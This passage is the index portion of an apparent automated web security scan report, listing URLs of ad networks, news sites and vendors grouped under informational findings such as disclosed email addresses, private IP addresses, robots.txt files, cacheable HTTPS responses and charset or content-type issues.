19.14. http://gallery.pictopia.com/
19.15. http://image2.pubmatic.com/
19.16. http://imp.fetchback.com/
19.17. http://mi.adinterax.com/
19.18. http://ping.crowdscience.com/
19.19. http://pixel.33across.com/
19.20. http://puma.vizu.com/
19.21. http://q1.checkm8.com/
19.22. http://qa.n7.vp2.abc.go.com/
19.23. http://rt.legolas-media.com/
19.24. http://sensor2.suitesmart.com/
19.25. http://t.mookie1.com/
19.26. http://track.pubmatic.com/
19.27. http://usadmm.dotomi.com/
19.28. http://widgets.outbrain.com/
19.29. http://www.4info.com/
19.30. http://www.kaltura.com/
19.31. https://www.mailjet.com/
19.32. http://www.tmz.com/
20. Email addresses disclosed
20.1. http://a.abc.com/service/gremlin/js/files/s_code.js
20.2. http://advancedvoip.com/
20.3. http://bostonherald.com/news/regional/view.bg
20.4. http://bostonherald.com/projects/your_tax_dollars.bg
20.5. http://bostonherald.com/track/inside_track/view.bg
20.6. http://bostonherald.com/track/inside_track/view/20110907sox_with_heels/
20.7. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx
20.8. http://cache2-scripts.pressdisplay.com/res/services/ResourceManagerHandler.ashx
20.9. http://duckduckgo.com/d.js
20.10. http://dw1.s81c.com/developerworks/js/jquery/cluetip98/jquery.hoverIntent.minified.js
20.11. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
20.12. http://freeradius.org/faq/cistron.html
20.13. http://info.desktone.com/cloudhosted.virtual.desktop.free.trial.html
20.14. http://info.desktone.com/gaw.hosted.virtual.desktop.free.trial.html
20.15. http://info.mailtraq.com/wac
20.16. http://l.yimg.com/a/combo
20.17. http://livechat.iadvize.com/chat_init.js
20.18. http://mi.adinterax.com/customer/yahoohouse/4/SapientTest/Yahoo_IM/.ob/IM_425x600.flv.hi.video.mp4
20.19. http://vads.adbrite.com/vast/adserver
20.20. http://vads.adbrite.com/vast/adserver
20.21. http://vads.adbrite.com/vast/adserver
20.22. http://vads.adbrite.com/vast/adserver
20.23. http://vads.adbrite.com/vast/adserver
20.24. http://vads.adbrite.com/vast/adserver
20.25. http://vads.adbrite.com/vast/adserver
20.26. http://vads.adbrite.com/vast/adserver
20.27. http://vads.adbrite.com/vast/adserver
20.28. http://www-01.ibm.com/support/docview.wss
20.29. http://www-935.ibm.com/services/us/igs/smarterdatacenter.html
20.30. http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
20.31. http://www.alepo.com/javascript/validation.js
20.32. http://www.aradial.com/
20.33. http://www.aradial.com/aradial-radius-server-billing-corporate.html
20.34. http://www.aradial.com/aradial-radius-server-billing-customers.html
20.35. http://www.aradial.com/aradial-radius-server-billing-home-content.html
20.36. http://www.astac.net/
20.37. http://www.astac.net/js/extjs/adapter/jquery/ext-jquery-adapter.js
20.38. http://www.astac.net/js/extjs/ext-all.js
20.39. http://www.astac.net/js/extjs/resources/css/ext-all.css
20.40. http://www.bradsdeals.com/res/opt/global.js
20.41. http://www.desktone.com/
20.42. http://www.desktone.com/sup/js/lib/colorbox/jquery.colorbox-min.js
20.43. http://www.disenter.com/
20.44. http://www.enstarllc.com/
20.45. http://www.google.com/search
20.46. http://www.ibm.com/developerworks/js/jquery/cluetipdwtag/jquery.dimensions.min.js
20.47. http://www.ibm.com/developerworks/js/jquery/cluetipdwtag/jquery.hoverIntent.minified.js
20.48. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html
20.49. http://www.ibm.com/developerworks/tivoli/library/s-csscript/
20.50. http://www.itoncommand.com/Awards.aspx
20.51. http://www.itoncommand.com/CaseStudies.aspx
20.52. http://www.itoncommand.com/Downloads.aspx
20.53. http://www.itoncommand.com/GetAQuote.aspx
20.54. http://www.itoncommand.com/Login.aspx
20.55. http://www.itoncommand.com/Products.aspx
20.56. http://www.itoncommand.com/Support.aspx
20.57. http://www.itoncommand.com/WhyIToC.aspx
20.58. http://www.itoncommand.com/demo/xxxx_main.html
20.59. http://www.itoncommand.com/hosteddesktop.aspx
20.60. http://www.kaltura.com//api_v3/index.php
20.61. http://www.matrix42.com/downloads/wp-vdi-demystified/
20.62. http://www.matrix42.com/typo3/sysext/cms/tslib/media/scripts/jsfunc.layermenu.js
20.63. http://www.microsenseindia.com/js/jcarousellite_1.0.1.js
20.64. http://www.mitzmara.com/
20.65. http://www.mitzmara.com/media%20relations.htm
20.66. http://www.open.com.au/cgi-bin/sf.cgi
20.67. http://www.open.com.au/howtobuy.html
20.68. http://www.open.com.au/index.html
20.69. http://www.open.com.au/radiator/
20.70. http://www.open.com.au/radiator/downloads.html
20.71. http://www.open.com.au/radiator/evaluation.html
20.72. http://www.open.com.au/radiator/features.html
20.73. http://www.open.com.au/services.html
20.74. https://www.open.com.au/cgi-bin/sf.cgi
20.75. https://www.open.com.au/onlineorder.php
20.76. http://www.radius-server.com/
20.77. http://www.radius-server.com/products.htm
20.78. http://www.radius-server.net/
20.79. http://www.radius-server.net/aradial-radius-server-billing-customers.html
20.80. http://www.radius-server.net/aradial-radius-server-billing-home-content.html
20.81. http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html
20.82. http://www.radius-server.net/aradial-radius-server-billing-partners.html
20.83. http://www.radius-server.net/aradial-radius-server-billing-pop-main.html
20.84. http://www.radius-server.net/blank-inner.html
20.85. http://www.radius-server.net/radius-billing.html
20.86. http://www.radius.cistron.nl/
20.87. http://www.radius.cistron.nl/README.pam
20.88. http://www.spotngo.ca/
20.89. http://www.spotngo.ca/services.htm
20.90. http://www.ted.com/css/global.css
20.91. http://www.teranews.com/faq.html
20.92. https://www.thundernews.com/common/js/common.js
20.93. http://www.usenetserver.com/en/support.php
20.94. http://www.vm.ibm.com/search/search.cgi
20.95. http://www.westhost.com/js/jquery.hoverIntent.js
21. Private IP addresses disclosed
21.1. http://api.facebook.com/restserver.php
21.2. http://beta.abc.go.com/shows/charlies-angels
21.3. http://beta.abc.go.com/shows/charlies-angels/bios
21.4. http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
21.5. http://cdnbakmi.kaltura.com/html5/html5lib/org/mwEmbedLoader.php
21.6. http://external.ak.fbcdn.net/safe_image.php
21.7. http://external.ak.fbcdn.net/safe_image.php
21.8. http://external.ak.fbcdn.net/safe_image.php
21.9. http://external.ak.fbcdn.net/safe_image.php
21.10. http://external.ak.fbcdn.net/safe_image.php
21.11. http://external.ak.fbcdn.net/safe_image.php
21.12. http://external.ak.fbcdn.net/safe_image.php
21.13. http://external.ak.fbcdn.net/safe_image.php
21.14. http://freeradius.org/faq/cistron.html
21.15. http://q1.checkm8.com/adam/detect
21.16. http://q1.checkm8.com/adam/detect
21.17. http://q1.checkm8.com/adam/detect
21.18. http://q1.checkm8.com/adam/detect
21.19. http://q1.checkm8.com/adam/detect
21.20. http://q1.checkm8.com/adam/report
21.21. http://q1digital.checkm8.com/adam/cm8adam_1_call.js
21.22. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css
21.23. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css
21.24. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/tRfGGwGuu8y.css
21.25. http://wiki.freeradius.org/FAQ
21.26. http://www.facebook.com/brandlift.php
21.27. http://www.facebook.com/extern/login_status.php
21.28. http://www.facebook.com/extern/login_status.php
21.29. http://www.facebook.com/extern/login_status.php
21.30. http://www.facebook.com/extern/login_status.php
21.31. http://www.facebook.com/extern/login_status.php
21.32. http://www.facebook.com/extern/login_status.php
21.33. http://www.facebook.com/extern/login_status.php
21.34. http://www.facebook.com/extern/login_status.php
21.35. http://www.facebook.com/extern/login_status.php
21.36. http://www.facebook.com/extern/login_status.php
21.37. http://www.facebook.com/extern/login_status.php
21.38. http://www.facebook.com/extern/login_status.php
21.39. http://www.facebook.com/extern/login_status.php
21.40. http://www.facebook.com/extern/login_status.php
21.41. http://www.facebook.com/extern/login_status.php
21.42. http://www.facebook.com/extern/login_status.php
21.43. http://www.facebook.com/extern/login_status.php
21.44. http://www.facebook.com/extern/login_status.php
21.45. http://www.facebook.com/extern/login_status.php
21.46. http://www.facebook.com/extern/login_status.php
21.47. http://www.facebook.com/plugins/activity.php
21.48. http://www.facebook.com/plugins/activity.php
21.49. http://www.facebook.com/plugins/facepile.php
21.50. http://www.facebook.com/plugins/like.php
21.51. http://www.facebook.com/plugins/like.php
21.52. http://www.facebook.com/plugins/like.php
21.53. http://www.facebook.com/plugins/like.php
21.54. http://www.facebook.com/plugins/like.php
21.55. http://www.facebook.com/plugins/like.php
21.56. http://www.facebook.com/plugins/like.php
21.57. http://www.facebook.com/plugins/like.php
21.58. http://www.facebook.com/plugins/like.php
21.59. http://www.facebook.com/plugins/like.php
21.60. http://www.facebook.com/plugins/like.php
21.61. http://www.facebook.com/plugins/like.php
21.62. http://www.facebook.com/plugins/like.php
21.63. http://www.facebook.com/plugins/like.php
21.64. http://www.facebook.com/plugins/like.php
21.65. http://www.facebook.com/plugins/like.php
21.66. http://www.facebook.com/plugins/like.php
21.67. http://www.facebook.com/plugins/like.php
21.68. http://www.facebook.com/plugins/like.php
21.69. http://www.facebook.com/plugins/like.php
21.70. http://www.facebook.com/plugins/like.php
21.71. http://www.facebook.com/plugins/like.php
21.72. http://www.facebook.com/plugins/like.php
21.73. http://www.facebook.com/plugins/like.php
21.74. http://www.facebook.com/plugins/like.php
21.75. http://www.facebook.com/plugins/like.php
21.76. http://www.facebook.com/plugins/like.php
21.77. http://www.facebook.com/plugins/like.php
21.78. http://www.facebook.com/plugins/likebox.php
21.79. http://www.facebook.com/plugins/likebox.php
21.80. http://www.facebook.com/plugins/likebox.php
21.81. http://www.google.com/sdch/sXoKgwNA.dct
22. Credit card numbers disclosed
22.1. http://assets.newsinc.com/flash/widget_toppicks01ps2.xml
22.2. http://showadsak.pubmatic.com/AdServer/AdServerServlet
23. Robots.txt file
23.1. http://2912a.v.fwmrm.net/crossdomain.xml
23.2. http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js
23.3. http://a.tribalfusion.com/j.ad
23.4. http://abc.go.com/shows/charlies-angels
23.5. http://action.media6degrees.com/orbserv/hbpix
23.6. http://ad.afy11.net/ad
23.7. http://ad.auditude.com/adserver
23.8. http://ad.turn.com/server/ads.js
23.9. http://ad.yieldmanager.com/pixel
23.10. http://adm.fwmrm.net/crossdomain.xml
23.11. http://ads.bluelithium.com/pixel
23.12. http://adserver.teracent.net/tase/ad
23.13. http://alerts.4info.com/alert/ads/dispatcher.jsp
23.14. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php
23.15. http://api.bizographics.com/v2/profile.redirect
23.16. http://api.facebook.com/restserver.php
23.17. http://as.casalemedia.com/j
23.18. http://as1.suitesmart.com/99917/G15493.js
23.19. http://at.amgdgt.com/ads/
23.20. http://attwireless-www.baynote.net/baynote/tags3/common
23.21. http://b.voicefive.com/b
23.22. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3
23.23. http://beta.abc.go.com/shows/charlies-angels
23.24. http://bh.heraldinteractive.com/includes/processAds.bg
23.25. http://bigapple.contextuads.com/fc/go2.php
23.26. http://bostonherald.com/news/regional/view.bg
23.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs
23.28. http://c.betrad.com/a/n/44/546.js
23.29. http://c.brightcove.com/services/viewer/federated_f9
23.30. http://cache.heraldinteractive.com/CSS/version5.0/sections_beta.css
23.31. http://cdn.abc.go.com/crossdomain.xml
23.32. http://cdn.gigya.com/JS/gigya.js
23.33. http://cdn.kaltura.com/crossdomain.xml
23.34. http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf
23.35. http://cdn.media.abc.go.com/m/images/global/generic/logo.png
23.36. http://cdn.optmd.com/V2/80181/197812/index.html
23.37. http://cdn.turn.com/server/ddc.htm
23.38. http://cdnbakmi.kaltura.com/p/591531/sp/59153100/flash/kdp3/v3.5.17.6/kdp3.swf
23.39. http://cheetah.vizu.com/a.gif
23.40. http://cim.meebo.com/cim
23.41. http://clk.atdmt.com/go/335787632/direct
23.42. http://cm.g.doubleclick.net/pixel
23.43. http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848
23.44. http://d14.zedo.com/ads6/d/3853/172/951/0/2/i.js
23.45. http://d7.zedo.com/img/bh.gif
23.46. http://dp.33across.com/ps/
23.47. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_4_2/StdBanner.js
23.48. http://g-pixel.invitemedia.com/gmatcher
23.49. http://g.ca.bid.invitemedia.com/pubm_imp
23.50. http://g2.gumgum.com/services/get
23.51. http://gallery.pictopia.com/bostonherald/
23.52. http://gscounters.gigya.com/gs/api.ashx
23.53. http://imagec12.247realmedia.com/RealMedia/ads/Creatives/BostonHerald/Monster_RON_728x90/Monster_728x90_FINAL.swf/1297456388
23.54. http://imp.fetchback.com/serve/fb/adtag.js
23.55. http://ll.static.abc.com/m/vp2/sfp/prod/v1.0.0/js/abc/sfp2.js
23.56. http://load.exelator.com/load/
23.57. http://loadm.exelator.com/load/
23.58. http://log.go.com/log
23.59. http://map.media6degrees.com/orbserv/aopix
23.60. http://metrics.tmz.com/b/ss/wbrostmz/1/H.20.3/s31416852392721
23.61. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75
23.62. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/national/remembering_911/home/L24/1480354666/Right/BostonHerald/Pictopia_160x600_House/Pictopia-160x600.jpg/4d686437616b35776e72734144666853
23.63. http://odb.outbrain.com/utils/ping.html
23.64. http://p4.choubllcbxhka.a3wlja2w5g6k7l2x.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
23.65. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.755902.s1.v4.ipv6-exp.l.google.com/gen_204
23.66. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
23.67. http://pixel.33across.com/ps/517389/
23.68. http://pixel.invitemedia.com/data_sync
23.69. http://ps2.newsinc.com/Playlist/show/90017/1957/507.xml
23.70. http://puma.vizu.com/cdn/00/00/23/91/smart_tag.js
23.71. http://q1.checkm8.com/adam/detect
23.72. http://qa.n7.vp2.abc.go.com/crossdomain.xml
23.73. http://r.casalemedia.com/j.gif
23.74. http://r.turn.com/r/beacon
23.75. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653
23.76. http://r1.zedo.com/log/ERR.gif
23.77. http://rds.yahoo.com/b.gif
23.78. http://rt.legolas-media.com/lgrt
23.79. http://rt1302.infolinks.com/crossdomain.xml
23.80. http://rt1701.infolinks.com/crossdomain.xml
23.81. http://rt1702.infolinks.com/crossdomain.xml
23.82. http://rt1803.infolinks.com/crossdomain.xml
23.83. http://rt1804.infolinks.com/static/blank.html
23.84. http://rt1903.infolinks.com/crossdomain.xml
23.85. http://s0.2mdn.net/2906542/11dvm_quiltednorthern_banners_300x250.swf
23.86. http://sana.newsinc.com/sana.html
23.87. http://search.yahoo.com/search
23.88. http://segment-pixel.invitemedia.com/pixel
23.89. http://sensor2.suitesmart.com/sensor4.js
23.90. http://servedby.flashtalking.com/imp/3/16718
23.91. http://site.abc.go.com/crossdomain.xml
23.92. http://spe.atdmt.com/ds/WURTCBIOGTYS/TYS_WayneDeepa_Banner/TYS219_WayneDeepa_300x250.swf
23.93. http://static-gallery.pictopia.com.edgesuite.net/providerasset/1081/bherald_style.css
23.94. http://stats.kaltura.com/crossdomain.xml
23.95. http://traffic.outbrain.com/network/redir
23.96. http://trk.vindicosuite.com/Tracking/V3/Instream/Impression/
23.97. http://us.adserver.yahoo.com/a
23.98. http://usadmm.dotomi.com/dmm/servlet/dmm
23.99. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674
23.100. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif
23.101. http://www.4info.com/js/auto_jump.js
23.102. http://www.att.com/u-verse/availability/
23.103. http://www.bostonherald.com/news/
23.104. http://www.bradsdeals.com/dealsoftheday/subscribe/b
23.105. http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
23.106. http://www.meebo.com/cim/sandbox.php
23.107. http://www.tmz.com/
24. Cacheable HTTPS response
24.1. https://admin.usenetbinaries.com/cgi-bin/signup
24.2. https://admin.usenetbinaries.com/favicon.ico
24.3. https://www.easynews.com/signup/lookit.phtml
24.4. https://www.giganews.com/favicon.ico
24.5. https://www.giganews.com/images/fonts/museo_slab_500-webfont.woff
24.6. https://www.giganews.com/images/fonts/museo_slab_500italic-webfont.woff
24.7. https://www.giganews.com/images/fonts/museosans_500-webfont.woff
24.8. https://www.mailjet.com/signup
24.9. https://www.open.com.au/cgi-bin/sf.cgi
24.10. https://www.open.com.au/favicon.ico
24.11. https://www.open.com.au/onlineorder.php
24.12. https://www.open.com.au/style/osc
24.13. https://www.thundernews.com/favicon.ico
25. Multiple content types specified
26. HTML does not specify charset
26.1. http://ad.doubleclick.net/adi/N4682.126265.CASALEMEDIA/B5564795.9
26.2. http://ad.doubleclick.net/adi/N6092.yahoo.com/B5098223.106
26.3. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10
26.4. http://ad.doubleclick.net/pfadx/tmz_cim/
26.5. http://ad.yieldmanager.com/iframe3
26.6. http://advancedvoip.com/favicon.ico
26.7. http://advancedvoip.com/images/voip_billing_solution_partner_bp.jpg
26.8. http://aud.pubmatic.com/AdServer/Artemis
26.9. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3
26.10. http://bgs-soft.com/Products_Sgagent.html
26.11. http://bgs-soft.com/sgagent/
26.12. http://bh.heraldinteractive.com/includes/processAds.bg
26.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs
26.14. http://ca.rtb.prod2.invitemedia.com/build_creative
26.15. http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848
26.16. http://cplads.appspot.com/file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html
26.17. http://freeradius.org/
26.18. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9
26.19. http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html
26.20. http://now.eloqua.com/visitor/v200/svrGP.aspx
26.21. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91
26.22. http://odb.outbrain.com/utils/ping.html
26.23. http://p4.choubllcbxhka.a3wlja2w5g6k7l2x.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
26.24. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html
26.25. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
26.26. http://pixel.invitemedia.com/data_sync
26.27. http://s0.wp.com/wp-content/themes/vip/images/bg_wrap_viewtalks_maincontent.gif
26.28. http://s0.wp.com/wp-content/themes/vip/images/bg_wrap_viewtemplate.gif
26.29. http://sana.newsinc.com/sana.html
26.30. http://search.alepo.com/img/onebyone.gif
26.31. http://secure-us.imrworldwide.com/cgi-bin/m
26.32. http://secure-us.imrworldwide.com/ocr/e
26.33. http://sensor2.suitesmart.com/sensor4.js
26.34. http://showadsak.pubmatic.com/AdServer/AdServerServlet
26.35. http://squirrelmail.org/sflogo.html
26.36. http://static.scanscout.com/optout/iframe.html
26.37. http://tag.admeld.com/ad/iframe/221/tmz/728x90/homepage_btf
26.38. http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782
26.39. http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html
26.40. http://tag.admeld.com/passback/iframe/221/tmz/728x90/6/meld.html
26.41. http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet
26.42. http://uac.advertising.com/wrapper/aceUACping.htm
26.43. http://widgets.mobilelocalnews.com/
26.44. http://www-03.ibm.com/innovation/us/watson/
26.45. http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/index.html
26.46. http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/smarter-answers-for-a-smarter-planet.html
26.47. http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/watson-schematic.html
26.48. http://www.advancedvoip.com/favicon.ico
26.49. http://www.advancedvoip.com/images/voip_billing_solution_partner_bp.jpg
26.50. http://www.alepo.com/isp-billing.shtml
26.51. http://www.alepo.com/radius-server.shtml
26.52. http://www.alepo.com/wifi.shtml
26.53. http://www.aradial.com/
26.54. http://www.aradial.com/aradial-radius-server-billing-corporate.html
26.55. http://www.aradial.com/aradial-radius-server-billing-customers.html
26.56. http://www.aradial.com/aradial-radius-server-billing-home-content.html
26.57. http://www.aradial.com/favicon.ico
26.58. http://www.att.com/navservice/navservlet
26.59. http://www.bostonheraldineducation.com/blog-posts.php
26.60. http://www.bostonheraldineducation.com/favicon.ico
26.61. http://www.courier-mta.org/imap/header.html
26.62. http://www.desktone.com/free_trial
26.63. http://www.disenter.com/disenter.css
26.64. http://www.disenter.com/favicon.ico
26.65. https://www.easynews.com/signup/lookit.phtml
26.66. http://www.elfqrin.com/hacklab/pages/nntpserv.php
26.67. http://www.ibm.com/ibm100/us/en/icons/v17-hp.html
26.68. http://www.itoncommand.com/demo/xxxx_main.html
26.69. http://www.radius-server.net/
26.70. http://www.radius-server.net/aradial-radius-server-billing-customers.html
26.71. http://www.radius-server.net/aradial-radius-server-billing-home-content.html
26.72. http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html
26.73. http://www.radius-server.net/aradial-radius-server-billing-partners.html
26.74. http://www.radius-server.net/aradial-radius-server-billing-pop-main.html
26.75. http://www.radius-server.net/blank-inner.html
26.76. http://www.radius-server.net/radius-billing.html
26.77. http://www.radius.cistron.nl/
26.78. http://www.radius.cistron.nl/faq/
26.79. http://www.spotngo.ca/
26.80. http://www.spotngo.ca/services.htm
26.81. http://www.vm.ibm.com/favicon.ico
26.82. http://www.websitealive2.com/89/Visitor/vTracker_v2.asp
27. HTML uses unrecognised charset
27.1. http://js-kit.com/api/session/refresh.js
27.2. http://www.tmz.com/
27.3. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
27.4. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/
27.5. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/
27.6. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
27.7. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/
27.8. http://www.tmz.com/reset-password/
27.9. http://www.tmz.com/signin/
27.10. http://www.toofab.com/
27.11. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
27.12. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
27.13. http://www.toofab.com/category/celeb-couples/
27.14. http://www.toofab.com/news/
28. Content type incorrectly stated
28.1. http://a1.interclick.com/getInPageJS.aspx
28.2. http://a1.interclick.com/getInPageJSProcess.aspx
28.3. http://ad.doubleclick.net/pfadx/tmz_cim/
28.4. https://admin.usenetbinaries.com/favicon.ico
28.5. http://adserver.teracent.net/tase/ad
28.6. http://advancedvoip.com/images/VoIP_white_papers.jpg
28.7. http://advancedvoip.com/images/VoIP_white_papers_up.jpg
28.8. http://advancedvoip.com/images/voip_billing_company.jpg
28.9. http://advancedvoip.com/images/voip_billing_company_contact.jpg
28.10. http://advancedvoip.com/images/voip_billing_company_contact_p.jpg
28.11. http://advancedvoip.com/images/voip_billing_company_p.jpg
28.12. http://advancedvoip.com/images/voip_billing_enterprise_solution.jpg
28.13. http://advancedvoip.com/images/voip_billing_enterprise_solution_p.jpg
28.14. http://advancedvoip.com/images/voip_billing_products.jpg
28.15. http://advancedvoip.com/images/voip_billing_products_p.jpg
28.16. http://advancedvoip.com/images/voip_billing_provider.jpg
28.17. http://advancedvoip.com/images/voip_billing_provider_p.jpg
28.18. http://ar.voicefive.com/b/rc.pli
28.19. http://attwireless-www.baynote.net/baynote/tags3/common
28.20. http://aud.pubmatic.com/AdServer/Artemis
28.21. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2
28.22. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0
28.23. http://blekko.com/autocomplete
28.24. http://bostonherald.com/edge/includes/twitter.inc
28.25. http://bostonherald.com/news/includes/twitter.inc
28.26. http://bostonherald.com/projects/payroll_ajax_api.bg
28.27. http://bostonherald.com/track/includes/twitter.inc
28.28. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx
28.29. http://bostonheraldnie.newspaperdirect.com/epaper/Services/ImgGalleryHandler.ashx
28.30. http://bs.serving-sys.com/BurstingPipe/adServer.bs
28.31. http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848
28.32. http://cpanel.app9.hubspot.com/salog.js.aspx
28.33. http://duckduckgo.com/d.js
28.34. http://event.adxpose.com/event.flow
28.35. http://goku.brightcove.com/1pix.gif
28.36. http://helpdocs.westserver.net/v3/sitemanager/whstart.ico
28.37. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard
28.38. http://imp.fetchback.com/serve/fb/adtag.js
28.39. http://livechat.iadvize.com/rpc/referrer.php
28.40. http://members.westhost.com/favicon.ico
28.41. http://network.realmedia.com/favicon.ico
28.42. http://now.eloqua.com/visitor/v200/svrGP.aspx
28.43. http://oascentral.bostonherald.com/favicon.ico
28.44. http://pglb.buzzfed.com/63857/8b52baa86e5b07ac085974feb13e2090
28.45. http://pglb.buzzfed.com/63857/bb0a99aabad3110617eff2ef79bb3c27
28.46. http://pglb.buzzfed.com/63857/d9dfb925d83ec9decb12af7e255ebee7
28.47. http://ping.crowdscience.com/ping.js
28.48. http://ps2.newsinc.com/Playlist/show/90017/1564/1252.xml
28.49. http://ps2.newsinc.com/Playlist/show/90017/1957/507.xml
28.50. http://rt1302.infolinks.com/action/doq.htm
28.51. http://rt1302.infolinks.com/action/getads.htm
28.52. http://rt1701.infolinks.com/action/doq.htm
28.53. http://rt1702.infolinks.com/action/doq.htm
28.54. http://rt1803.infolinks.com/action/doq.htm
28.55. http://rt1901.infolinks.com/action/doq.htm
28.56. http://rt1903.infolinks.com/action/doq.htm
28.57. http://sales.liveperson.net/hcp/html/mTag.js
28.58. http://sensor2.suitesmart.com/sensor4.js
28.59. http://showadsak.pubmatic.com/AdServer/AdServerServlet
28.60. http://site.abc.go.com/_lib/getCountry
28.61. http://sr2.liveperson.net/hcp/html/mTag.js
28.62. http://stats.kaltura.com//api_v3/index.php
28.63. http://thumbnail.newsinc.com/23529280.sf.jpg
28.64. http://thumbnail.newsinc.com/23529394.sf.jpg
28.65. http://usenetjunction.com/scripts/track.php
28.66. http://www-03.ibm.com/innovation/us/watson/javascripts/pulse.js
28.67. http://www-146.ibm.com/nfluent/transwidget/tw.jsp
28.68. http://www.advancedvoip.com/images/VoIP_white_papers.jpg
28.69. http://www.advancedvoip.com/images/VoIP_white_papers_up.jpg
28.70. http://www.advancedvoip.com/images/voip_billing_company.jpg
28.71. http://www.advancedvoip.com/images/voip_billing_company_contact.jpg
28.72. http://www.advancedvoip.com/images/voip_billing_company_contact_p.jpg
28.73. http://www.advancedvoip.com/images/voip_billing_company_p.jpg
28.74. http://www.advancedvoip.com/images/voip_billing_enterprise_solution.jpg
28.75. http://www.advancedvoip.com/images/voip_billing_enterprise_solution_p.jpg
28.76. http://www.advancedvoip.com/images/voip_billing_products.jpg
28.77. http://www.advancedvoip.com/images/voip_billing_products_p.jpg
28.78. http://www.advancedvoip.com/images/voip_billing_provider.jpg
28.79. http://www.advancedvoip.com/images/voip_billing_provider_p.jpg
